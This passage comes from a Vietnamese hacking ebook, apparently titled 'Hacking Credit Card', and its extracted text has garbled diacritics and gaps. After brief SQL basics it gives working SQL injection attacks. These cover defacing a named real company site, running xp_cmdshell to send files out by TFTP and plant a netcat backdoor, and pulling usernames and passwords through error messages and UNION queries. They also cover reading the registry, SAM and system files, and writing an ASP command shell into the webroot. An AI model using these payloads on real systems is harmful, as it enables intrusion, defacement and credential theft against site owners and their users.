HAVING SUM(tn_ct) iu_kin gi_tr
Ta s dng li bng Sales trn. Cu lnh SQL sau:
SELECT Company, SUM(Amount) FROM Sales
GROUP BY Company
HAVING SUM(Amount) > 10000
s tr v kt qu:
Company SUM(Amount)
W3Schools 12600
B danh
Vi SQL, b danh c thc s dng cho tn ca ct v tn ca bng.
B danh ct:
C php b danh ct nh sau:
8/7/2019 Hacking Credit Card
37/61
SELECT tn_ct AS b_danh_ct FROM tn_bng
B danh bng:
B danh bng c c php nh sau:
SELECT tn_ct FROM tn_bng AS b_danh_bng
V d s dng b danh ct:
Ta c bng Persons nh sau:
LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger
Cu lnh SQL sau:
SELECT LastName AS H, FirstName AS Tn
FROM Persons
S tr v kt qu:
H Tn
Hansen Ola
Svendson Tove
Pettersen Kari
DeFace bng SQL injection, Cbn
(by sinhcv)
8/7/2019 Hacking Credit Card
38/61
FOR NEWBIEHihi em xin tip tc,bi ny vn l cbn cho newbie,cn cao siu hn th em chu.yem xin mn php ly thng Ford ra lm victim.Mc ch ca bi ny l s dng cc culnh update,insert ,drop,delete... trong SQL deFace.To 1 file c ni dung nh sau:TIM KIEM DIA DIEM JOB
Save as li thnh file xx.html,sau run nh sauTIM KIEM: xxxDIA DIEM: 22JOB: 1' SQL command --Trong database ca n c table Fordvn_news vi cc column
MessageId','Status','Priority','Subject','Lead','Img','Posted','Edited','Published','FromIp','Body','ReadCount'Tng ng vi trang news ca nhttps://www.ford.com.vn/News/News.aspy em xin chn ci subject deface vi messageid=146Roi:y l cc cu lnh cn bit
Insert into user ("id","pas") values (1,"xxx")-- /*thm 1 user xxx vo table user */update user set pass="xxxx" where id=1-- /thay i pasword ca thng user c id=1 */drop table user-- /*nguy him,xa table user */drop database db-- /*rt nguy him/delete from user where id=1-- /*xa column */..............y em dng updateQUOTETIM KIEM: xxxDIA DIEM: 22
https://www.ford.com.vn/News/News.asphttps://www.ford.com.vn/News/News.asp8/7/2019 Hacking Credit Card
39/61
JOB: 1' ;update fordvn_news set subject='TEST' where messageid=146--Nu bn nhn dc 1 thng bo nh th ny thay v 1 thng bo li SQL th thnh cng ri
QUOTEKhng tm c theo yu cu ca bn!
OK come on
https://www.ford.com.vn/News/News.asp
Bn cn c th lm dc nhiu th hn ti na,y ch l VD thoai.
Good luck !!!
Hack server b SQL Injection
( Copyright by Windak )
( --Thanks bro Aclatinh and bro MRRO-- )
1)T l thnh cng 80%:
iu kin server phi l winnt v user dng inject l user c quyn dng xp_cmdshell(sa, dbo)
check bn c th lm sau y trn inject link
[injection link] %2b convert (int,(system_user())
Nu KQ l sa hoc dbo c l bn c th tn cng c ri.
Nu bn c sa hoc dbo nhng m admin li khng cho s dng cmdshell bn hy btn ln (bt th no t tm hiu nh )
Lu : bn s ch hackc vo server cha database ca n thi (nhiu khi tdatabase chung vi host )
Cc tool cn thit :
8/7/2019 Hacking Credit Card
40/61
tftpd32 , backdoor
+++Mt vi kinh nghim hack, bit lnh DOS v mt cht hiu bit v network
2) Tng bc tip cn
a)Cc khi nim:
Lu : Cch hack ny ca ti khng phi l mt chung nht, bi v cn rt nhiu cchkhc, cch ny ca ti hack thng qua giao thc TFTP.
Ni sv giao thc TFTP :
l mt giao thc truyn file serverclient . N hot ng tng t nh FTP nhngn gin hn nhiu , thng qua port 69, v mt u im, n khng cn password (y liu quan trng ta hack)
Vo DOS g tftp /? -> Bn sc c php ca n nh sau :
TFTP [-i] host PUT || GET filename [v tr file mun gi n]
-i : nu bn cn truyn mt file dng binary hy s dng n
host : IP ca my server
PUT : nu bn mun send file
GET : nu bn mun ly file
V d v mt lnh tftp :
Tftp i xxx.xxx.xxx.xxx PUT netcat.exe C:\nc.exe
S ly file netcat.exe trn my server (my c IP xxx.) v chuyn vo C:\nc.exe trnmy client (my g lnh trn)
By gita s test trc tip trn localhost. bn hy mtftpd32 ln bin my mnh thnhmt server tftp (lu phi tt ht firewall giao thc mi thc hin tt)
Trong tftpd32 c phn BASE directory mc nh l [path to]\tftpd32e, n s l th mct cc file up hoc download ca bn khi thc hin trao i file vi client (v bn lserver) (bn c th change nu thch).
Trong bi ny ti dng [link] thay cho link cc bn inject, hy chnh li cho ph hp run exec (thm (), ( nu cn )
8/7/2019 Hacking Credit Card
41/61
V dng thay cho Ip ca cc bn (n s hin th khi cc bn bt tftpd32)
Tn cng thc s:
-------------------------------BEGIN----------------------------------
Command1 : RUN COMMAND DOS trn my victim :
[link] exec master..xp_cmdshell [command]
Command 2 : DOWNLOAD FILE t my victim
[link] exec master..xp_cmdshell tftp PUT [path][filecandown]
V d : Ly Ip my victim :
(1)[link] exec master..xp_cmdshell ipconfig > a.txt
(2)[link] exec master..xp_cmdshell tftp PUT a.txt
----Gii thch :
(1) : run lnh ny : ipconfig >a.txt to file a.txt vi ni dung l kt qu ca lnhipconfig
(2) : run tftp PUT a.txt chuyn file a.txt vi ni dung va to --> server (mychng ta )
Command3 : UPLOAD BACKDOOR ln my victim :
[link] exec master..xp_cmdshell tftp [i] GET backdoor [path muon backdoorct]
v d : upload netcat vo C:\WINNT:
[link] exec master..xp_cmdshell tftp i GET nc.exe C:\WINNT\nx.exe
----------------------------------END------------------------------
3) Kt:
8/7/2019 Hacking Credit Card
42/61
Nh vy chng ta bit cch run command (bn c th run file exe ) , bit down, upfile, hu nh lm chc server ri y . Cn hack nhanh hay chm, hiu qu baonhiu l do bn
( Nu test thy li g xin lin hhttp://shacker.computed.net/baivet/nangcao/[email protected] )
Chc hack vuiy
vn SQL:
Hack Sql Inject nng cao
Cc bn th xem mt cu truy vn SQL:
select id, forename, surname from authors th 'id','forename' v 'surname' l column catable author,khi cu truy vn trn lm vic th n s cho kt qu tt c cc dng trongtable author.Xem cu truy vn sau:
select id, forename, surname from authors where forename = 'john' and surname = 'smith'
y l cu truy vn c iu kin chc khng ni cc bn cng bit,n cho ra kt qu ttc nhng ai trong csdl vi forename = 'john' and surname = 'smith'
V vy khi vo gi tru vo khng ng nh trong csdl liu:
Forename: jo'hn
Surname: smith
Cu truy vn trthnh:
select id, forename, surname from authors where forename = 'jo'hn' and surname = 'smith'
Cu truy vn trn khi c x l th n s pht sinh li:
Server: Msg 170, Level 15, State 1, Line 1
Line 1: Incorrect syntax near 'hn'.
L do l ta lng vo du nhy n "'" v gi tr vo trthnh 'hn' sai so vi csdl vy spht sinh li li dng ci ny attacker c th xo d liu ca bn nh sau:
http://shacker.computed.net/baivet/nangcao/[email protected]://shacker.computed.net/baivet/nangcao/[email protected]8/7/2019 Hacking Credit Card
43/61
Forename: jo'; drop table authors--
Table author s b xa ->nguy him phi khng
Nhn vo on code asp sau:y l mt form login
Login Page
Login
Username:
Password:
8/7/2019 Hacking Credit Card
44/61
y l code 'process_login.asp'
p { font-size=20pt ! important}
font { font-size=20pt ! important}
h1 { font-size=64pt ! important}
8/7/2019 Hacking Credit Card
45/61
and password = '" + password + "'";
trace( "query: " + sql );
rso.open( sql, cn );
if (rso.EOF)
{
rso.close();
%>
ACCESS DENIED
ACCESS GRANTED
8/7/2019 Hacking Credit Card
46/61
Welcome,
0)
{
Login( cn );
}
cn.close();
}
Main();
%>
y l cu truy vn SQL:
var sql = "select * from users where username = '" + username + "'and password = '" +password + "'";
8/7/2019 Hacking Credit Card
47/61
nu hacker vo nh sau:
Username: '; drop table users--
Password:
th table 'user; s b xo,v ta c th vt qua bng cch sau:bypass cc bn bit ht riti khng ni li na - ( Bn tham kho li Cn bn hack 1 website b li SQLInjection )
trng username hacker c th vo nh sau:
Username: ' union select 1, 'fictional_user', 'some_password', 1--
v d table userc to nh sau:
create table users( id int,
username varchar(255),
password varchar(255),
privs int
)
v insert vo:
insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
8/7/2019 Hacking Credit Card
48/61
insert into users values( 0, 'fred', 'sesame', 0x00ff )
Cc hacker s bit c kt qu cc column v table qua cu truy vn having 1=1
Username: ' having 1=1--
Li pht sinh:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/process_login.asp, line 35
Tip tc ly cc ci cn li:
Username: ' group by users.id having 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause.
/process_login.asp, line 35
>> bit c column 'username'
' group by users.id, users.username, users.password, users.privs having 1=1--
8/7/2019 Hacking Credit Card
49/61
Cho n khi khng cn bo li th dng li , vy l bn bit table v column cn khaithc ri, by gin i ly gi tr ca n:
xc nh ni dung ca column ta dng hm sum()
Username: ' union select sum(username) from users--
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35
Gi tr ca username l varchar,khng ni cc bn cng bit l do,cn dng vi id th saonh:
Username: ' union select sum(id) from users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL
statement containing a UNION operator must have an equal number of
expressions in their target lists.
/process_login.asp, line 35
Vy l ta c th insert vo csdl:
Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff)--
Ly Version ca server:
Username: ' union select @@version,1,1,1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
8/7/2019 Hacking Credit Card
50/61
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int.
/process_login.asp, line 35
c th dng convert() nhng ti ch cc bn dng union ,cc bn thc ni dung ca ccuser trogn table nh sau:
Username: ' union select min(username),1,1,1 from users where username > 'a'--
Chn gi tr nh nht ca username v cho n ln hn 'a' -> pht sinh li:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35
Vy l ta bit 'admin' acc tn ti,tip tc xem sao:
Username: ' union select min(username),1,1,1 from users where username 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35
8/7/2019 Hacking Credit Card
51/61
Vy l khi c username -> ly pass:
Username: ' union select password,1,1,1 from users where username ='admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35
y l k thut m bn c th ly c user mt cch cao cp:
To mt script nh sau:
begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end
->cu truy vn:
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
To mt table 'foo' vi mt column l 'ret'
8/7/2019 Hacking Credit Card
52/61
Tip tc:
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
/process_login.asp, line 35
(Hnh nh mrro dng kiu ny vo VDC)
Xo du vt:
Username: '; drop table foo--
Mt hacker khi iu kin c csdl th h mun xa hn l iu khin h thng mngca server lun,mt trong s cch :
1-S dng xp_cmdshell khi c quyn 'sa'
2-S dng xp_regread c register,bao gm SAM
3-Chy link query trn server
4-To script trn server khai thc
5-S dng 'bulk insert' c bt c file no trn h thng
6-S dng bcp to qun cho text file trn server
7-S dng sp_OACreate, sp_OAMethod and sp_OAGetProperty to script (ActiveX)chy trn server
8/7/2019 Hacking Credit Card
53/61
[xp_cmdshell]
Chc cc bn cng nghe nhiu ri v d:
exec master..xp_cmdshell 'dir'
exec master..xp_cmdshell 'net1 user'
S dng thi hnh cc lnh ca dos vvv.. rt hu hiu
[xp_regread]
Cc hm lin quan...
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
V d:
exec xp_regread HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
8/7/2019 Hacking Credit Card
54/61
Xc inh null-session share c tn ti trn server
exec xp_regenumvaluesHKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
vv.. cn nhiu th na
[Other Extended Stored Procedures]
services:
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
>ng qua cng bit n lm g...
[Importing text files into tables]
S dng 'bulk insert' chn text file vo th mc hin thi,to table n:
create table foo( line varchar(8000) )
tip tc:
bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
[Creating Text Files using BCP]
VD:
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
8/7/2019 Hacking Credit Card
55/61
[ActiveX automation scripts in SQL Server]
Dng 'wscript.shell'
vd:
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Tren cu truy vn:
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod@o, 'run', NULL, 'notepad.exe'--
Dng 'scripting.filesystemobject' c file:
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
To script ASP thi hnh command:
8/7/2019 Hacking Credit Card
56/61
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:\inetpub\wwwroot\foo.asp', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
''
y l nhng cch bn c th dng rt hiu qu,bn hy sng to thm cho mnh tnhng ch dn cbn ny.
Sql Inject M lnh
Ti bit chc rng cc bn y a s ch bit SQL injection bypass login, hm nay txin mn php trnh by nhng k thut m ta c th lm nhiu iu hn l ch vt quapassword ca mt trang b SQL injection.
Lu : a s kin thc ca ti di y ch dng cho server chy MySQL, MSSQL, cnnhng ci khc th khng chc.... Nu bn cha bit lnh SQL th khng nn c bi nym nn tham kho n trc, OKie ??? Ti khng mun thy nhng cu tr li i loinh --- "Tui chng hiu g ht ", "Si u th" ,.....
1)Ly tn table v column hin hnh:
Structure :
Login page (or any injection page)::::
username: ' having 1=1--
KQ: -------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid inthe select list because it is not contained in an aggregate function and there is no GROUPBY clause.
8/7/2019 Hacking Credit Card
57/61
--------------------------------------
----> Ta c c TABLE VICTIM
Tip tc
username: ' group by VICTIM.ID having 1=1--
KQ :---------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalidin the select list because it is not contained in either an aggregate function or the GROUPBY clause.
-------------------------------------------
Vy l ta c column Vuser
2) UNION nh m hiu qu
Vng tha cc bn, ta c th dng n ly c gn nh mi th .
Trc ht ti xin ni squa ci Structure ca n :
Login page ::::
username : ' Union select [column] from [table] where [column2=...]--
password : everything
Vd: Gi s ta bit 2 column username v password trong table VTABLE cua dbvictim l VUSER v VPASS th ta lm nh sau
username : ' Union select VPASS from VTABLE where VUSER='admin'-- (1)
password : everything
8/7/2019 Hacking Credit Card
58/61
(1) : Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, ns cho bn useru tin
KQ:-----------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statementcontaining a UNION operator must have an equal number of expressions in their targetlists.
---------------------------------
Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c columnca table VTABLE c Union ht. Structure ca n nh sau:
username : ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)
password : everything
Bn hy thm ",1" cho n khi kt qu ra i loi nh
--------------------------------
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting thenvarchar value 'tuibihackroi' to a column of data type int.
--------------------------------
Nh vy Pass ca user 'admin' l 'tuibihackroi'
Vng tha cc bn SQL injection tht th v, v y l iu ta c th lm trong bi vithm nay ca ti : Ly sch database ca i phng.
8/7/2019 Hacking Credit Card
59/61
3) Ly ht value ca mt column bit trong mt table bit
B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bitrc):
Vi Vuser l admin ta c th ly c cc user khc
-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in(admin)
-------------------------
Vng, sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in (vd: Not in (admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(dnhinsau l mi password).
**** ly danh sch tn cc user theo mt quy nh m bn chn , v d chi ly ccuser c cha t admin chng hn ta dng like : cu trc
-----Login Page ::::::
username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)
like %admin%
-------------------------
4) Ly ht table v column ca ca database:
B quyt chnh l table ny ca database : INFORMATION_SCHEMA.TABLES vicolumn TABLE_NAME (cha ton b table) v table :INFORMATION_SCHEMA.COLUMNS vi column COLUMN_NAME (cha ton b
column)
Cch s dng dng Union:
-----Login page :::::::
8/7/2019 Hacking Credit Card
60/61
username: UNION SELECT TABLE_NAME,1,1,1,1 FROMINFORMATION_SCHEMA.TABLES WHERE .
---------------------------
Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :
-----Login page :::::::
username: UNION SELECT COLUMN_NAME FROMINFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and
---------------------------
Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn,cn lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch chocc bn mt cht khi gp mt site b SQl injection
5) Khng cn UNION:
Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert"mt cch d dng hn thu thp info qua cc thng bo li
Structure :
---login page::::
user : ' + convert (int,(select @@version))--
-------------------------
Trn l mt v d bn ly version, giy mun ly bt c info no bn ch cn thayvo ci "select @@version" nhng nhnu l ln u tin get info th thm TOP 1 vonh
8/7/2019 Hacking Credit Card
61/61
vd: user : ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--
Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc hy thay n === %2b
vd: user : ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--
6) Run command SQL :
run command bn c th dng du ";"
Structure :
login page :::::
user :' ; [command]--
-----------------------------
vd: '; DROP TABLE VTABLE--
Nu cc bn rnh v SQL th c th lm c rt nhiu iu th v qua ci ny , nhng txin phn cho cc bn t nghin cu nh.
Chm ht cun Ebook. Chc cc bn may mn. Hack ch l hc hi v